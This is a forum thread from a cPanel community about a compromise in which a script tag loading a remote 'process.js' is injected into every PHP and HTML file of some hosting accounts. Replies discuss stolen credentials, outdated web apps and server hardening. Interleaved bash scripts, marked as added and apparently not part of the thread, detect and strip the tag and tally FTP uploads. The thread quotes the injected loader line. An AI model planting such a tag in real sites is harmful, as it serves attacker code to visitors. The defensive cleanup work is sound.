The Community Forums


security problem, php and html files vulnerability

Discussion in 'Security' started by upsforum, Jun 27, 2012.

  1. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    For 2 days I have had a problem with some accounts on some of my VPSs with cPanel.

    I must find and replace a specific string in all accounts; I find this in all PHP and HTML files on some FTP roots:

    <script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>

    in the first line of every file, and I must run a combination of find and sed commands to remove it.
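The find-and-strip cleanup described in this post, as an added bash example that is not code from the thread or from cPanel. It assumes GNU find and sed (as on CentOS 6) and that the injected `src` is exactly the one quoted above; the sample document root it builds for a dry run is constructed. Only files whose first line carries the tag are touched, so a file that merely mentions the domain elsewhere is left alone.

```shell
#!/bin/bash
# Added example (not from the thread): locate .php/.html/.htm files whose FIRST
# line is the injected <script> tag and strip that line.
# Assumptions: GNU find/sed; the injected src is exactly INJECTED_SRC.

INJECTED_SRC='http://domainname.com/wp-content/uploads/process.js'

# Print the path of every web file under $1 whose first line contains the
# injected src. Detection only: nothing is modified.
scan_injected() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec sh -c 'head -n 1 "$1" | grep -qF -- "$2" && printf "%s\n" "$1"' _ {} "$INJECTED_SRC" \;
}

# Delete line 1 of each file that scan_injected reports (grep -F already
# confirmed that line 1 is the injected tag). Prints each cleaned path.
# GNU sed -i rewrites the file in place and keeps its mode.
strip_injected() {
    scan_injected "$1" | while IFS= read -r f; do
        sed -i '1d' "$f"
        printf 'cleaned %s\n' "$f"
    done
}

# Build a constructed document root for a dry run and print its path.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/public_html/blog"
    tag="<script type=\"text/javascript\" src=\"$INJECTED_SRC\"></script>"
    printf '%s\n<?php echo "hello"; ?>\n' "$tag" > "$d/public_html/index.php"        # infected
    printf '%s\n<html><body>about</body></html>\n' "$tag" > "$d/public_html/blog/about.html"  # infected
    printf '<?php\n// %s\n' "$INJECTED_SRC" > "$d/public_html/clean.php"          # URL on line 2 only: leave alone
    printf '%s\nplain text\n' "$tag" > "$d/public_html/notes.txt"                  # not a web file: ignored
    printf '%s\n' "$d"
}

# Usage: ./cleanup.sh scan /home/acct/public_html
#        ./cleanup.sh strip /home/acct/public_html
if [ "$#" -eq 2 ]; then
    case "$1" in
        scan)  scan_injected "$2" ;;
        strip) strip_injected "$2" ;;
    esac
fi
```

Run `scan` first and keep its output as the list of affected files; only then run `strip`, and take a backup of the account before doing so. Removing the line fixes the served pages but not the way they were written, so the rest of this thread still applies.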
     
  2. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    For security I changed some account passwords, but I checked the FTP log and did not see activity from this.
     
  3. qwerty

    qwerty Well-Known Member

    Joined:
    Jan 21, 2003
    Messages:
    213
    Likes Received:
    0
    Trophy Points:
    16
    It sounds like your server may have been rooted/compromised. Try and contact Steve at
    http://www.rack911.com/
     
  4. upsforum

    upsforum Well-Known Member

    Joined:
    Jul 27, 2005
    Messages:
    446
    Likes Received:
    0
    Trophy Points:
    16
    I use CentOS 6 and the suPHP module.
     
  5. qwerty

    qwerty Well-Known Member

    Joined:
    Jan 21, 2003
    Messages:
    213
    Likes Received:
    0
    Trophy Points:
    16
    That makes no difference whatsoever. If all of your sites are serving malware, the server has most likely been compromised in some way, possibly rooted. You need an expert to look at it and help you get it up and running normally again...and secure it against future problems.
     
  6. d'argo

    d'argo Active Member

    Joined:
    Jul 4, 2012
    Messages:
    36
    Likes Received:
    0
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    If all the domains on the same server were not affected then the server isn't owned, the domains have been compromised. Which usually means the passwords for those domains were stolen from infected desktops. Check your logs, particularly your FTP logs, to see if these files are just being uploaded. If they are, it's stolen credentials and fairly easy to fix: just change the users' passwords and restore the domain files from good backups.

    If every domain on the same server is affected the server might be owned. If you aren't sure, reinstall the entire box from scratch and lock it down, or hire someone to lock it down. Trying to clean up an owned server is next to impossible, especially if a kernel rootkit got installed.
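The FTP-log check this post recommends, as an added bash example that is not code from the thread or from cPanel. It assumes the standard xferlog transfer-log layout (pure-ftpd and proftpd both write it; the path `/var/log/xferlog` is an assumption), where field 12 is the transfer direction and "i" means an incoming upload. The sample log lines are constructed; the hostnames, addresses and account names in them are made up.

```shell
#!/bin/bash
# Added example (not from the thread): list FTP uploads of web files from an
# xferlog-format log, then tally them per "user from host". Seeing the same
# remote host push files into several accounts with valid logins is the
# stolen-credentials pattern described above, as opposed to a rooted server.
# xferlog fields: 1-5 date, 6 xfer-time, 7 remote-host, 8 size, 9 filename,
# 10 type, 11 flag, 12 direction (i=upload, o=download), 13 mode, 14 user, ...

# Constructed sample lines for offline use (RFC 5737 test addresses).
SAMPLE_XFERLOG='Wed Jun 27 03:12:44 2012 1 203.0.113.45 2048 /home/acct1/public_html/index.php a _ i r acct1 ftp 1 * c
Wed Jun 27 03:12:45 2012 1 203.0.113.45 512 /home/acct1/public_html/contact.html a _ i r acct1 ftp 1 * c
Wed Jun 27 03:13:02 2012 2 198.51.100.7 4096 /home/acct2/public_html/wp-config.php a _ o r acct2 ftp 1 * c
Wed Jun 27 03:20:11 2012 1 203.0.113.45 2048 /home/acct2/public_html/index.php a _ i r acct2 ftp 1 * c
Wed Jun 27 08:01:00 2012 3 192.0.2.9 10240 /home/acct3/public_html/logo.png b _ i r acct3 ftp 1 * c'

# Read xferlog lines on stdin; print "Mon DD HH:MM:SS YYYY user host file"
# for every upload (direction i) of a .php/.html/.htm file.
web_uploads() {
    awk '$12 == "i" && $9 ~ /\.(php|html?)$/ { print $2, $3, $4, $5, $14, $7, $9 }'
}

# Read xferlog lines on stdin; print "count user host", busiest first.
uploads_by_user_host() {
    web_uploads | awk '{ n[$5 " " $6]++ } END { for (k in n) print n[k], k }' | sort -rn
}

# Usage: ./ftp_uploads.sh /var/log/xferlog   (path is an assumption)
if [ "$#" -eq 1 ]; then
    uploads_by_user_host < "$1"
fi
```

Run it against the log for the period in which the files changed and compare the hosts it reports with where the account owners actually connect from; a single unfamiliar host uploading into several accounts points at stolen passwords, while no FTP uploads at all for files that did change means the write came from somewhere else (a web script, or the server itself).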
     
  7. PlotHost

    PlotHost Well-Known Member

    Joined:
    Apr 29, 2011
    Messages:
    253
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    US
    cPanel Access Level:
    Root Administrator
    You should also install mod_security w/ atomic rules. Also always update your scripts to the latest versions.
     
  8. konrath

    konrath Well-Known Member

    Joined:
    May 3, 2005
    Messages:
    367
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brasil
    Hello

    Verify whether enable_dl is on in php.ini. If it is on, then turn it off.

    Thank you
    Konrath
     
  9. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    SuPHP is substantially better than DSO (mod_php) but doesn't in itself prevent any cross-site injection or scripting.

    The problem you have described originates from an exploit of a vulnerable web script, usually either an old version of osCommerce or an old version of WordPress about 70% of the time.

    Most of the other 30% typically originates from the user being compromised with a trojan at home that allows the hackers to just simply steal their passwords from their own computers.

    Once a single site has successfully been compromised, it is generally trivial to compromise the rest of the hosting accounts from within the server unless really hardcore security measures have been actively put into place --- for most hosting administrators on average, they probably haven't done that.

    The discussion of what all you need to do to properly lock down your server correctly is much too lengthy to really be able to write in a single forum post and would be an extended discussion in and of itself.

    What I would recommend doing right now, before looking into any of that, is first get all your clients' web scripts and applications fully up to the minute up to date with the newest versions and don't allow anyone to run anything that is in any way significantly old ---- allowing clients to run old scripts is just asking for trouble in itself.
     